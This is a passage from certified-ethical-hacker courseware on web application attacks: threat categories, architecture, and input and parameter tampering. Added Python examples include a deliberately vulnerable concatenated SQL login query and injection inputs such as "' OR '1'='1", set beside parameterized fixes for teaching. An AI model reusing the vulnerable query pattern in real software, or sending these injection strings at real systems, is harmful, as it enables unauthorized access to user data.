
Hacking Web Applications

Module 13

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Hacking Web Applications

Module 13

Engineered by Hackers. Presented by Professionals.

CEH

Ethical Hacking and Countermeasures v8

Module 13: Hacking Web Applications Exam 312-50

Module 13 Page 1724

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.


Security News

XSS Attacks Lead Pack As Most Frequent Attack Type


Source: http://www.darkreading.com

Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.

Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge.

The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers, don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 2012 can be broken down as follows:

As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic.

Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last:

During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."

Copyright 2013 UBM Tech, All rights reserved

http://www.darkreading.com/security/news/240009508/firehost-q3-web-application-report-xssattacks-lead-pack-as-most-frequent-attack-type.html


Module Objectives

- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing


Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications, together with the attacks that exploit them. The module starts with a detailed description of web applications, followed by the various web application threats. The hacking methodology reveals the steps involved in a planned attack. The tools that attackers use are discussed to explain how they exploit vulnerabilities in web applications, and the countermeasures that can be taken to thwart such attacks are highlighted. Security tools that help network administrators monitor and manage web applications are described. Finally, web application pen testing is discussed. This module familiarizes you with:

- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing


Module Flow

Web applications are application programs that are accessed over an Internet connection. These applications use HTTP as their primary communication protocol. Attackers target these applications for several reasons, and they are exposed to a wide variety of attacks. For a clear understanding of "hacking web applications," we divide the concept into the following sections:

- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

Let us begin with the Web App concepts.


This section introduces you to web applications and their components, explains how a web application works, and describes its architecture. It provides insight into Web 2.0 applications, the vulnerability stack, and web attack vectors.


Web Application Security Statistics


Source: https://www.whitehatsec.com

According to the WhiteHat Security Website Statistics Report for 2012, cross-site scripting vulnerabilities are found in more web applications than any other class of vulnerability. From the graph you can observe that in 2012 cross-site scripting was the most common vulnerability, found in 55% of web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. To minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.

FIGURE 13.1: WhiteHat Security Website Statistics Report, 2012 (bar chart of vulnerability classes by the percentage of web applications affected: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration)


Introduction to Web Applications

- Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser
- Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
- Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
- New web technologies such as Web 2.0 provide more attack surface for web application exploitation

Introduction to Web Applications

Web applications are applications that run on a remote web server and send their output over the Internet. Web 2.0 technologies are used by web-server-based applications for functions such as communication with users, clients, and third parties. A web application is composed of many layers of functionality, but it is usually considered a three-layered architecture consisting of presentation, logic, and data layers.

The web architecture relies substantially on the technology popularized by the World Wide Web: Hypertext Markup Language (HTML) and the primary transport medium, Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically it operates over TCP port 80, but it may also communicate over another unused port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers today are Microsoft IIS, the Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE. Resources are named by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content.

Since HTTP is stateless, i.e., the protocol does not maintain a session state, requests for resources are treated as separate and unique, so the integrity of a link is not maintained with the client. Cookies can be used as tokens that servers hand over to clients to allow access to websites, so that users do not have to request a token for each query. However, cookies are not perfect from a security point of view because they can be copied and are stored on the client's local hard disk. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance, and new web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers discover the different types of vulnerabilities present in web applications and exploit them to compromise those applications; they also use tools to launch their attacks.


Web Application Components

The components of web applications are listed as follows:

- Login: Most websites allow legitimate users to access the application by means of a login; to access the service or content offered by the web application, the user needs to submit his or her username and password. Example: gmail.com
- The Web Server: Either software or hardware intended to deliver web content that can be accessed through the Internet; an example is the web pages served to the web browser by the web server.
- Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.
- User Permissions: When a logged-in user is not permitted to access the requested web page, the application redirects the user back to the login page or to another page.
- The Application Content: An interactive program that accepts web requests from clients and uses the parameters sent by the web browser to carry out certain functions.
- Data Access: Web pages usually reach the database through a data access library in which all the database details are stored.


- The Data Store: Holds the important data that is shared and synchronized between the application's child processes or threads. This stored information is quite important and necessary for higher levels of the application framework. The data store and the web server need not be on the same network; they can reach each other through a network connection.
- Role-level System Security
- Application Logic: Web applications are usually divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and services it accordingly. The services offered by the application logic include querying and updating the database as well as generating the user interface.
- Logout: An individual can log out of the web application or close the browser so that the session and the application state associated with it end. The session ends either on the initiative of the application logic or automatically when the servlet session times out.


How Web Applications Work

(Slide diagram: a request for the news item with ID 6329 under the topic "Tech" is turned by the application into the database query SELECT * from news where id = 6329, and the matching item, labelled CNN on the slide, is returned as output.)
Whenever someone clicks a link or types in the browser, the requested website or content is immediately displayed on the screen, but what is the mechanism behind this? The following is the step-by-step process that takes place once a user sends a request for particular content or a website; several computers are involved. The web application model is explained in three layers. The first layer deals with user input through a web browser or user interface. The second layer contains the dynamic content generation technology, such as JSP (Java servlets) or ASP (Active Server Pages), and the last layer contains the database that stores customer data such as user names and passwords, credit card details, or other related information. Let's see how the user triggers the initial request through the browser to the web application server: First, the user types the website name or URL in the browser and the request is sent to the web server. On receiving the request, the web server checks the file extension: if the user requests a simple web page with an HTM or HTML extension, the web server processes the request itself and sends the file to the user's browser.


If the user requests a web page with the extension CFM, CFML, or CFC, the request must be processed by the web application server, so the web server passes the user's request on to it. To process the request, the web application server accesses the database at the third layer and performs the requested task by updating or retrieving the stored information. Once the request has been processed, the web application server sends the results to the web server, which in turn sends them to the user's browser.
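The three-layer flow just described, as an added example that is not part of the courseware: a stand-in web server inspects the requested path, serves .htm/.html files itself, and hands the dynamic /news path to an application layer that queries the data layer. Python and an in-memory sqlite3 database replace the JSP/ASP/CFM runtime and the database server of the text; the static files, the /news route and the news rows (including the id 6329 shown on the slide) are constructed for this example. The point a defender should take from it is in the application layer: the id is validated and bound as a query parameter, so the SQL text is fixed and user input never becomes part of it.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed rows standing in for the data layer (third layer).
# The id 6329 mirrors the request shown on the slide.
NEWS_ROWS = [
    (6329, "Tech", "CNN", "Sample headline for id 6329"),
    (6330, "Sports", "CNN", "Sample headline for id 6330"),
]

# Constructed static pages standing in for files on the web server.
STATIC_FILES = {
    "/index.html": "<html><body>Welcome</body></html>",
    "/about.htm": "<html><body>About us</body></html>",
}


def open_database():
    """Create the in-memory data layer and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, source TEXT, title TEXT)"
    )
    conn.executemany("INSERT INTO news VALUES (?, ?, ?, ?)", NEWS_ROWS)
    return conn


def application_layer(conn, params):
    """Second layer: turn request parameters into a database query.

    The slide shows 'SELECT * from news where id = 6329'. Here the id is first
    checked to be a decimal integer and then bound through a '?' placeholder,
    so the query text never contains user-supplied characters.
    Returns an (http_status, body) tuple."""
    raw_id = params.get("id", [""])[0]
    if not raw_id.isdecimal():
        return 400, "Bad Request: id must be a positive integer"
    row = conn.execute(
        "SELECT * FROM news WHERE id = ?", (int(raw_id),)
    ).fetchone()
    if row is None:
        return 404, "Not Found"
    ident, topic, source, title = row
    return 200, f"{source} / {topic}: {title} (id {ident})"


def web_server(conn, url):
    """First hop: the web server looks at the requested path and decides whether
    to serve a static file itself or hand the request to the application layer.
    Returns an (http_status, body) tuple."""
    parts = urlsplit(url)
    path = parts.path
    params = parse_qs(parts.query)
    if path.endswith((".htm", ".html")):
        # Static page: served directly, no application layer involved.
        body = STATIC_FILES.get(path)
        return (200, body) if body is not None else (404, "Not Found")
    if path == "/news":
        # Dynamic page: the application layer builds the response from the database.
        return application_layer(conn, params)
    return 404, "Not Found"
```

Run it with `open_database()` once and pass the connection to `web_server(conn, "/news?id=6329")`; a request such as `/news?id=6329%20OR%201%3D1` is refused with a 400 before any SQL is executed, which is the behaviour to look for when reviewing how an application's second layer handles its parameters.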

FIGURE 13.2: Working of Web Application (User and Login Form, through the Internet and a Firewall, to the Web Server)


Web Application Architecture


All web applications execute with the help of the web browser as a supporting client. Web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. Information is presented by the client-side scripts, while back-end tasks such as storing and gathering the required data are handled by the server-side scripts. In the following architecture, clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. Data access is handled by the database layer, using cloud services and a database server.


FIGURE 13.3: Web Application Architecture

- Clients: web browser, smartphones, web appliance; presentation layer (Flash, Silverlight, JavaScript); external web services
- Web Server: presentation layer (firewall, HTTP request parser, servlet container, resource handler, authentication and login); proxy server, cache
- Business Layer: application server (J2EE, XCode, .NET, C++, COM, COM+); business logic; legacy application; data access
- Database Layer: cloud services; database server


Web 2.0 Applications


Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:

- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
- Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)


Vulnerability Stack
Web applications are maintained and accessed through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. The mechanisms or services employed at each level help the user in one way or another to access the web application securely. Security is a critical component to be considered for web applications because they are a major target of attacks. The following vulnerability stack shows the levels and the corresponding element, mechanism, or service employed at each level that can make a web application vulnerable:

FIGURE 13.4: Vulnerability Stack

- Custom Web Applications: Business Logic Flaws, Technical Vulnerabilities
- Third Party Components: Open Source / Commercial
- Database: Oracle / MySQL / MS SQL
- Web Server: Apache / Microsoft IIS
- Operating System: Windows / Linux / OS X
- Network: Router / Switch
- Security: IPS / IDS


Web Attack Vectors

- An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
- Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
- Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack
An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors:

- Parameter manipulation: The attacker provides wrong input values to web services and thereby gains control over the SQL, LDAP, XPath, and shell commands built from them. When incorrect values are accepted by web services, the web applications that rely on those services become vulnerable and are easily attacked.
- XML poisoning: Attackers provide manipulated XML documents that, when processed, disturb the logic of the parsing method on the server. When huge XML documents are processed at the application layer, the application can easily be compromised by the attacker to launch his or her attack and gather information.
- Client validation: Most client-side validation has to be backed by server-side authentication. AJAX routines can be easily manipulated, which in turn opens a way for attackers to carry out SQL injection, LDAP injection, etc. and compromise the web application's key resources.


- Server misconfiguration: The attacker exploits vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.
- Web service routing issues: SOAP messages are permitted to pass through different nodes on the Internet by the WS-Routers. Compromised intermediate nodes can give access to the SOAP messages communicated between two endpoints.
- Cross-site scripting: Whenever infected JavaScript code is executed, the targeted browsers can be exploited by the attacker to gather information.
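The server-side counterpart to the parameter manipulation, XML poisoning and client validation vectors listed above, as an added example that is not part of the courseware: every request parameter is re-validated on the server against an allowlist schema (so a value the client-side script would have refused, or a parameter the client never sends, is still caught), and an XML request body is only parsed after a size cap and a check that it declares no DTD or entities, which is where oversized and entity-expansion documents do their damage. The schema, the parameter names, the size limit and the sample documents are constructed for this example; the parser is Python's standard `xml.etree.ElementTree`.

```python
import re
import xml.etree.ElementTree as ET

# Allowlist schema, constructed for this example. Each entry maps a parameter
# name to (required, pattern). Anything absent from the schema is rejected, so a
# parameter that client-side code never sends cannot arrive unchecked.
SCHEMA = {
    "account_id": (True, re.compile(r"[0-9]{1,10}")),
    "action": (True, re.compile(r"view|export")),
    "note": (False, re.compile(r"[A-Za-z0-9 ,.\-]{0,200}")),
}


def validate_params(params):
    """Re-validate request parameters on the server regardless of any checks the
    browser performed. Returns (ok, errors) where errors lists each problem."""
    errors = []
    for name, (required, pattern) in SCHEMA.items():
        if name not in params:
            if required:
                errors.append(f"missing: {name}")
            continue
        # fullmatch anchors both ends, so '42 OR 1=1' fails even though it
        # starts with digits.
        if not pattern.fullmatch(params[name]):
            errors.append(f"invalid: {name}")
    for name in params:
        if name not in SCHEMA:
            errors.append(f"unexpected: {name}")
    return (not errors), errors


# Upper bound on an XML request body, constructed for this example.
MAX_XML_BYTES = 64 * 1024
# Any DTD or entity declaration is refused outright: legitimate request bodies
# do not need them, and they are the vehicle for entity-expansion documents.
DTD_MARKERS = ("<!DOCTYPE", "<!ENTITY")


def parse_xml_strictly(data):
    """Parse an XML request body (bytes) only after it passes size, encoding and
    DTD checks. Raises ValueError when the body is refused or malformed."""
    if len(data) > MAX_XML_BYTES:
        raise ValueError("xml body too large")
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise ValueError("xml body is not valid UTF-8") from exc
    if "\x00" in text:
        raise ValueError("xml body contains NUL bytes")
    if any(marker in text for marker in DTD_MARKERS):
        raise ValueError("xml body declares a DTD or entities")
    try:
        return ET.fromstring(text)
    except ET.ParseError as exc:
        raise ValueError(f"malformed xml: {exc}") from exc
```

`validate_params` returns the full list of problems rather than stopping at the first, which is what you want when logging rejected requests to spot tampering patterns; `parse_xml_strictly` decodes the bytes itself so that the DTD check runs on the same text the parser will see.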


Module Flow

Web applications are targeted by attackers for various reasons. The first is that the security quality of the source code is often poor; the second is that applications often have a complex setup. Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.


This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.


Web Application Threats-1 (slide): Information Leakage, Cookie Poisoning, Broken Account Management, Insecure Storage, Improper Error Handling

Web Application Threats-1


Web application threats are not limited to attacks based on URLs and port 80. Regardless of the ports, protocols, and OSI layers involved, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:

Cookie Poisoning
By changing the information inside a cookie, attackers bypass the authentication process, and once they gain control over the network, they can modify content, use the system for malicious attacks, or steal information from the user's system.

Directory Traversal
Attackers exploit HTTP by using directory traversal to access restricted directories and execute commands outside of the web server's root directory.

Unvalidated Input
In order to bypass the security system, attackers tamper with HTTP requests, URLs, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in cookies, and this becomes a source of attack for intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.

Cross-site Scripting (XSS)
An attacker bypasses the client's ID security mechanism, gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection
This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.

Parameter/Form Tampering
This type of tampering attack involves manipulating the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man-in-the-middle is one example of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.

Denial-of-Service (DoS)
A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control
Broken access control is a method used by attackers where a particular flaw related to access control has been identified, authentication is bypassed, and the attacker compromises the network.

Cross-site Request Forgery
The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses, for example, by clicking on a particular link sent through email or chat.

Information Leakage
Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.

Improper Error Handling
It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.

Log Tampering
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management
These attacks occur when security-sensitive credentials such as passwords and other useful material are not properly protected. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration
Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, and attackers exploit them to compromise web application security.

Broken Account Management
Even authentication schemes that are valid are weakened by vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.

Insecure Storage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, the web application may be at risk, as attackers can access the storage and misuse the information stored there. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.


Web Application Threats-2 (slide): Platform Exploits, Insecure Direct Object References, Insecure Cryptographic Storage, Insufficient Transport Layer Protection, Failure to Restrict URL Access, Obfuscation Application, DMZ Protocol Attacks, Security Management Exploits, Authentication Hijacking, Web Services Attacks, Unvalidated Redirects and Forwards, Session Fixation Attack, Malicious File Execution

Web Application Threats-2

Platform Exploits
Various web applications are built using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References
When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place. For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.

Insecure Cryptographic Storage
When sensitive data is stored in the database, it has to be properly encrypted using cryptography. Some encryption methods developed in-house by developers are not up to par; cryptographically strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, the attacker can obtain them easily and decrypt the sensitive data.


Authentication Hijacking
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.

Network Access Attacks
Network access attacks can majorly impact web applications. They can affect the basic level of services within an application and can allow access that standard HTTP application methods would not have.

Cookie Snooping
Attackers use cookie snooping on a victim's system to analyze the victim's surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.

Web Services Attacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.

Insufficient Transport Layer Protection
SSL/TLS should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and compromise of admin accounts may follow once systems have been compromised.

Hidden Manipulation
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.

DMZ Protocol Attacks
The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:

Compromise of the web application and data
Defacement of websites
Access to internal systems, including databases, backups, and source code


Unvalidated Redirects and Forwards
Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass leading to:

Session fixation attacks
Security management exploits
Failure to restrict URL access
Malicious file execution

Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.

Obfuscation Application
Attackers usually work hard at hiding their attacks to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.

Security Management Exploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.

Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user into accessing a legitimate web server using an explicit session ID value.

Malicious File Execution
Malicious file execution vulnerabilities have been found in most applications. This vulnerability is caused by unchecked input into the web server. Due to this unchecked input, the attacker's files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and in at least some cases, takes complete control over the systems.


Unvalidated Input

Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers.

An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning.

Unvalidated Input
An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtering, but various encoding methods exist that attackers can use to evade it. Many HTTP inputs have multiple formats that make filtering very difficult. Canonicalization is used to simplify the encodings and is useful in avoiding various attacks. Web applications that rely only on a client-side mechanism for input validation are easily bypassed by attackers. In order to bypass the security system, attackers tamper with HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in cookies, and this becomes a source of attack for intruders. Attackers gain access to systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.
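The concatenated login query shown in Figure 13.5, and the "OR 1=1" statement discussed under SQL Injection Attacks later in this module, can be reproduced against an in-memory SQLite database. The following Python is an added example written for this edit, not code from the module or from EC-Council; the Users rows, user names and passwords in it are constructed sample data, and sqlite3 stands in for the SQL Server/MySQL backend in the figures. It places the vulnerable string-building query beside its parameterized form so that the difference in behaviour on identical input is visible.

```python
import sqlite3

# Constructed sample data for the demo (not from the module): a Users table
# shaped like the one in Figure 13.5, plus a numeric UserID for the second query.
SAMPLE_USERS = [
    (2302, "jason", "springfield"),
    (2303, "alice", "placeholder-password"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID INTEGER, user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, user, pwd):
    """The concatenated query from Figure 13.5: unvalidated input becomes SQL syntax."""
    sql = ("select * from Users where user = '" + user
           + "' and pwd='" + pwd + "'")
    return len(conn.execute(sql).fetchall()) > 0


def login_safe(conn, user, pwd):
    """Hardened form: a parameterized query keeps the input as data, never as SQL."""
    sql = "select * from Users where user = ? and pwd = ?"
    return len(conn.execute(sql, (user, pwd)).fetchall()) > 0


def count_by_id_vulnerable(conn, user_id):
    """Numeric parameter pasted into the statement: '2302 OR 1=1' matches every row."""
    sql = "SELECT * FROM Users WHERE UserID = " + user_id
    return len(conn.execute(sql).fetchall())


def count_by_id_safe(conn, user_id):
    """Hardened form: validate the type first, then bind the value as a parameter."""
    uid = int(user_id)  # raises ValueError for anything that is not an integer
    sql = "SELECT * FROM Users WHERE UserID = ?"
    return len(conn.execute(sql, (uid,)).fetchall())


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable login with tautology:", login_vulnerable(db, "jason", tautology))
    print("parameterized login with tautology:", login_safe(db, "jason", tautology))
    print("vulnerable lookup rows:", count_by_id_vulnerable(db, "2302 OR 1=1"))
```

Running the file prints the outcome of each variant: the parameterized versions return False or raise ValueError on the same input because the database driver never interprets the bound value as SQL.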


Figure 13.5: Unvalidated Input. The browser POST request http://juggyboy.com/login.aspx?user=jason&pass=springfield is passed on to the database with the browser input not validated by the web application; the server builds the modified query as string sql = "select * from Users where user = '" + User.Text + "' and pwd='" + Password.Text + "'".


Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products.

A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.

Parameter/Form Tampering

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters.

Changed parameters in the form field are the best example of parameter tampering. When a user makes a selection on an HTML page, the selection is stored as a form field value and transferred to the web application in an HTTP request. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.


